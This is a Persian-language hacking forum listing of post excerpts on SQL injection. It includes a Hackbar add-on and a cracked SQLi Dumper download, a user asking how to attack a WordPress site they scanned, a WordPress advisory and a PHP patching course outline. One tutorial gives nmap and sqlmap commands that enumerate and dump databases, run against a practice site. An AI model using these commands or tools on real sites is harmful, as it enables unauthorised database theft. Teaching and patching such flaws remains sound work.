سلام دوستان. از اونجایی که ظاهرا پیر شدیم تو جوونی گفتیم کار بقیه رو اقلا رو راه بندازیم. اینجا افزونه Hackbar Professional رو براتون پیوست کردم. باید بگم که این افزونه علاوه بر نسخه ی اصلیِ hackbar دارای اضافه هایی هست که توی حملات خیلی بدردتون میخوره. مثلا میتونید لینک رو با انواع bypasser هایی که داره تست کنید و نیازی به تایپ دستی نباشه ولی سعی کنید که کد ها رو حفظ کنید و درک داشته باشید نه اینکه فقط چند تا کلیک کرده باشید. ضمناً این افزونه روی Cyberfox 59 هم نصب میشه. سایبرفاکس رو بگیرید و این افزونه رو روش نصب کنید. رمز عبور : guardiran.org Hackbar Professional Moded by r3yz3 - guardiran.org.rar
-
- hackbar professional
- sqli attack
-
(و 5 مورد دیگر)
برچسب زده شده با :
-
با سلام دوستانی که در مورد زمینه های زیر اطلاعات دارند لطفا راهنمایی کنند. با تشکر DOS Attach (Hping3) in Kali Sniffing Attack (ARP Table & DNS Attack ) in Kali Wireless Password Crack with Air Crack in Kali ICMP Sendig with Nmap in Kali Information Gathering with Nmap in Kali SQL Injection in Kali OpenVas Configuration in Kali
- 7 پاسخ
-
- kali linux
- hping3
-
(و 4 مورد دیگر)
برچسب زده شده با :
-
مشکل در هک سایت با باگ sql
mtnblack پاسخی ارسال کرد برای یک موضوع در سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
سلام دوستان .. درود من یک سایتی رو اسکن کردم و فهمیدم که باگ sql injection داره .. توی آموزش های انجمن هم درست توضیح ندادن که بفهمیم باید چیکار کنیم و الان من نمیدونم چجوری باید این سایت رو بزنمش.. توی آموزش ها به این شکل گفته شده .. www.example.com/news.php?id=1 .... من هرکاری میکنم نمیدونم این قسمت رو (news.php?id=1) باید از کجا پیداش کنم...اصلا این چی هست؟؟ چجوری باید این id رو پیدا کنم ؟ اون سایتی که من اسکنش کردم با وردپرس ساخته شده ممنون میشم اگر راهنمایی کنید و یا یک سایتی رو به همین روش بزنید و به صورت تصویری پست کنید توی انجمن..- 15 پاسخ
-
- sql
- sql injection
-
(و 6 مورد دیگر)
برچسب زده شده با :
-
اگر وبسایت وردپرس دارید حتما به نسخه 4.8.3 بروزرسانیش کنید. Severity Medium Patch available YES Number of vulnerabilities 1 CVSSv2 5 (AV:N/AC:M/Au:N/C:P/I:P/A:P/E:U/RL:OF/RC:C) CVSSv3 6.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:U/RL:O/RC:C] CVE ID N/A CWE ID CWE-89 Exploitation vector Network Public exploit Not available Vulnerable software WordPress Vulnerable software versions WordPress 4.8.2 WordPress 4.8.1 WordPress 4.8 Show more Vendor URL WordPress.ORG Advisory type Public Security Advisory 1) SQL injection Description The vulnerability allows a remote attacker to execute arbitrary SQL commands in application's database. The vulnerability exists due to an error in $wpdb->prepare() that can lead to SQL injection attacks exploited via third-party software. Successful exploitation of the vulnerability may allow an attacker to execute arbitrary SQL commands in web application database. Remediation Update to version 4.8.3. External links [Hidden Content]
-
پیش نیازهای اجرا: .net framework 3.5 + 4.6 Visual C++ 2017 x64/x86 رمز : guardiran.org SQLi Dumper 9.2.1.part4.rar SQLi Dumper 9.2.1.part1.rar SQLi Dumper 9.2.1.part2.rar SQLi Dumper 9.2.1.part3.rar SQLi Dumper 9.2.1.part5.rar
-
- cracked
- sqli scanner
-
(و 7 مورد دیگر)
برچسب زده شده با :
-
استفاده از NMAP به همراه SQLMAPبرای SQL Injection (تصویری)
d0kt0r پاسخی ارسال کرد برای یک موضوع در اسکنرها Scanners
سلام با این آموزش برای SQL Injection دیگه نیازی به خیلی از ابزار ها و اسکریپت ها نخواهید داشت هر دو ابزار NMap و SQLmap روی کالی لینوکس نصبه. در این آموزش برای تست ابزار ها از لینک های زیر استفاده میکنیم که میتونین برای تمرین استفاده کنین: www.vulnweb.com testphp.vulnweb.com *** در وارد کردن هدف //:https رو پاک کنید و فقط .www بمونه!!! *** 1. با استفاده از کامند زیر وب سایت هدف رو برای پیدا کردن باگ SQL مثله warning page اسکن کنید: nmap -sV -script=http-sql-injection address website -p 80 *سویچ sV- میگه که پورت باز رو برای یافتن سرویس و نسخه ی اون پروب کن. *سویچ script- میگه از اسکریپت های ابزار nmap برای سکن هدف استفاده کن.(مثله : اسکنر باگ SQL) *سویچ p- هم میگه شماره پورت رو وارد کن که اینجا 80.(چون پورتیه که در وبسرور، سرور بهش گوش میده). *به جای address website ادرس هدف رو وارد کنید که اینجا برای تست: testphp.php.vulnweb.com بعد از یک مدت مکس برای اسپایدر کردن هدف که مدتش بستگی به حجم و صفحات وبسایت داره لیست صفحات دارای باگ رو خواهید دید. برای مثال : 2.از کامندهای زیر هم به ترتیب برای دست رسی به دیتا بیس و استخراج(مشاهده کالم و تیبل ها و../) اطلاعات استفاده کنید: sqlmap -u address yafte shode --dbs sqlmap -u address yafte shode -D esme data base --dump all *سویچ u- برای وارد کردن ادرس هدف. *سویچ dbs-- برای مشاهده ی دیتابیس های موجود در هدف. *سویچ D- برای وارد کردن اسم دیتابیس مورد نظر که اینجا . (عکس های خودم رو بعدا وارد میکنم فعلا همین باشه.) سوالی بود بپرسید d0kt0r .-
- باگ sql
- sql injection
-
(و 2 مورد دیگر)
برچسب زده شده با :
-
به نام خدا در این تاپیک قصد دارم تا آموزش آسیب پذیری های PHP و نحوه پچ کردن اون هارو آموزش بدم پیش نیاز این تاپیک اسکریپتی هست که من برای تیم نوشتم(اینجا) و آشنایی ابتدایی با زبان php در این تاپیک سعی میکنم که آسیب پذیری هارو به صورت کامل یعنی اول برسی میکنیم که چطور این آسیب پذیری به وجود میاد بعد این که یک نفوذگر چطور با استفاده از این آسیب پذیری به وب سایت شما نفوذ می کنه و بعد هم نحوه پچ کردن اون آسیب پذیری. سر فصل آموزش ها : - SQL Injection - Blind SQL Injection - Authentication Bypass - File Upload - Stored Cross Site Scripting - Reflected Cross Site Scripting - Dom Cross Site Scripting - Cross Site Request Forgery - Remote File Inclusion - Local File Disclosure/Download - Remote Code Execution - Remote Command Execution تاپیک به مرور زمان آپدیت خواهد شد پس لطفا با اسپم های بی جا خرابش نکنین سوالی داشتید میتونید در پ.خ و یا در بخش مربوطه بپرسید
- 2 پاسخ
-
- آسیب پذیری های php
- sql injection
-
(و 3 مورد دیگر)
برچسب زده شده با :